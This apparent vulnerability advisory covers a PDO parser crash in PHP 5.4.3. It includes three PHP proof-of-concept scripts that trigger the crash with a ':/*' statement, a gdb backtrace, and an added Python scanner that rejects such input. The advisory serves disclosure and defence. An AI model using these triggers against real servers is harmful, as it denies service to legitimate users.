PHP 5.4.3 – PDO Memory Access Violation Denial of Service

  • Author: 0x721427D8
    Date: 2012-08-02
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/37566/
  • source: https://www.securityfocus.com/bid/54777/info
    
    PHP is prone to a remote denial-of-service vulnerability in the PDO prepared-statement parser.
    
    An attacker who can influence the text of a statement handed to PDO::prepare() (the proofs of concept below use a ':' placeholder directly followed by a '/*' comment opener) can exploit this issue to crash the PHP worker handling the request, denying service to legitimate users.
    
    PHP 5.4.3 is vulnerable; other versions may also be affected.
    
    <?php
    // PoC 1: the statement text is built from $_GET['query']. mysql_real_escape_string()
    // (legacy mysql extension, needs an open mysql_connect() link) only escapes NUL, \n, \r,
    // backslash, quotes and \x1a, so a payload such as ":/*" reaches PDO::prepare() unchanged.
    try {
        $db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
        // tokens:
        // SELECT;*;from;'user';/*
        //$sql = "SELECT * from 'user'/*";
        $stmt = $db->prepare("SELECT * from 'user'" . mysql_real_escape_string($_GET['query']));
        $stmt->execute();
        // crash
        $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
        $stmt->fetch(PDO::FETCH_BOUND);
        print_r($type);
    }
    catch (Exception $e)
    {
        echo "Failed: " . $e->getMessage();
    }
    ?>
     -----
    <?php
    // PoC 2: minimal trigger, no user input needed. The whole statement is a bare ':'
    // placeholder followed by an unterminated '/*' comment.
    try {
        $db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
    
        // tokens:
        // SELECT;*;from;'user';/*
        $sql = ":/*";
    
        $stmt = $db->prepare($sql);
        $stmt->execute(); // crashes php worker in pdo_parse_params()
    
        $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
        $stmt->fetch(PDO::FETCH_BOUND);
        print_r($type);
    
    } catch (Exception $e) {
        echo "Failed: " . $e->getMessage();
    }
    
    ?>
    ---
    
    <pre>
    <?php
    // PoC 3: same trigger as PoC 2 with progress output, so that when run through a web
    // server the last line printed shows how far execution got before the worker died.
    echo "hmm beginning\n";
    try {
        $db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
        echo "lets get it on\n";
        // tokens:
        // SELECT;*;from;'user';/*
        $sql = "SELECT * from user :/**";
        echo $sql;
        $stmt = $db->prepare($sql);
        echo "prepared :)\n";
        print_r($stmt);
        $stmt->execute(); // crashes php worker in pdo_parse_params()
        print_r($stmt);
        echo "executed :(\n";
        $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
        $stmt->fetch(PDO::FETCH_BOUND);
        echo "--data-\n";
        print_r($type);
        echo "--data--\n";
    
    } catch (Exception $e) {
        echo "EXCEPTION";
        echo "Failed: " . $e->getMessage();
    }
    echo "hmmm end\n";
    ?>
    </pre>
    
    Actual result:
    --------------
    root@bt:/opt/lampp# gdb ./bin/php 
    (gdb) run poc_pdo_linux_short_1.php
    Starting program: /opt/lampp/bin/php /opt/lampp/poc_pdo_linux_short_1.php
    [Thread debugging using libthread_db enabled]
    
    Program received signal SIGSEGV, Segmentation fault.
    0x08228a81 in ?? ()
    (gdb) bt
    #0  0x08228a81 in ?? ()
    #1  0x082280eb in pdo_parse_params ()
    #2  0x08223891 in ?? ()
    #3  0x084b2aad in ?? ()
    #4  0x084b1f87 in execute ()
    #5  0x08490ed2 in zend_execute_scripts ()
    #6  0x0843f13c in php_execute_script ()
    #7  0x08506b46 in main ()
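    The backtrace lands in pdo_parse_params(), the stage that walks the statement text to find ? and :name placeholders. The following is an added example, not code from the advisory author and not PHP's own parser: a simplified Python model of such a scanner, written so that the shapes exercised by the PoCs above (a bare ':' with no name behind it, an unterminated '/*' comment) are rejected with an error instead of being scanned past the end of the statement. The tokenisation rules, the function names (scan_placeholders, check_statement) and the sample statements are assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass

# Added example: a simplified model of a PDO-style placeholder scanner. This is NOT
# PHP's pdo_parse_params(); the tokenisation rules below are assumptions chosen to
# show how the PoC inputs (":/*", "SELECT * from 'user'/*") must be rejected rather
# than scanned past the end of the statement text.


@dataclass
class Placeholder:
    kind: str   # "positional" for '?', "named" for ':name'
    name: str   # '' for a positional placeholder
    start: int  # offset of the first character in the statement text
    end: int    # offset one past the last character


class SqlParseError(ValueError):
    """Raised for statement text that cannot be scanned safely."""


_NAME = re.compile(r"[A-Za-z0-9_]+")


def scan_placeholders(sql):
    """Return the placeholders in `sql`, skipping quoted literals and comments.

    Raises SqlParseError on an unterminated literal or block comment and on a
    ':' that is not followed by a placeholder name (the ':/*' case from the PoC).
    """
    found = []
    i, n = 0, len(sql)
    while i < n:
        c = sql[i]
        if c in "'\"`":
            # Quoted literal / identifier: honour backslash escapes and doubled quotes.
            j = i + 1
            while j < n:
                if sql[j] == "\\" and j + 1 < n:
                    j += 2
                    continue
                if sql[j] == c:
                    if j + 1 < n and sql[j + 1] == c:
                        j += 2
                        continue
                    break
                j += 1
            else:
                raise SqlParseError("unterminated %s literal at offset %d" % (c, i))
            i = j + 1
        elif sql.startswith("/*", i):
            close = sql.find("*/", i + 2)
            if close < 0:
                raise SqlParseError("unterminated /* comment at offset %d" % i)
            i = close + 2
        elif sql.startswith("--", i) or c == "#":
            # Line comment: runs to end of line (or end of text).
            nl = sql.find("\n", i)
            i = n if nl < 0 else nl + 1
        elif c == "?":
            found.append(Placeholder("positional", "", i, i + 1))
            i += 1
        elif c == ":":
            if sql.startswith("::", i):
                # '::' is a PostgreSQL cast, never a placeholder.
                i += 2
                continue
            m = _NAME.match(sql, i + 1)
            if m is None:
                # This is the ':/*' shape: a bare ':' with no name behind it.
                raise SqlParseError("':' at offset %d is not followed by a placeholder name" % i)
            found.append(Placeholder("named", m.group(0), i, m.end()))
            i = m.end()
        else:
            i += 1
    return found


def check_statement(sql):
    """'ok' if the statement scans cleanly, otherwise the reason it is rejected."""
    try:
        scan_placeholders(sql)
    except SqlParseError as exc:
        return str(exc)
    return "ok"


if __name__ == "__main__":
    # Constructed inputs: the three statement strings from the PoCs plus one well-formed query.
    for stmt in (
        "SELECT * from 'user'/*",
        ":/*",
        "SELECT * from user :/**",
        "SELECT * FROM user WHERE id = :id AND name = ? /* ok */",
    ):
        print("%-55s -> %s" % (stmt, check_statement(stmt)))
```

    Run stand-alone it reports the three PoC statements as rejected and the well-formed query as ok. The design point is that every branch that consumes more than one character checks the remaining length first and fails closed; a scanner that treats ':' as the start of a name without verifying that a name follows, or that keeps reading after '/*' without finding '*/', is exactly the kind of code that ends up reading past the buffer.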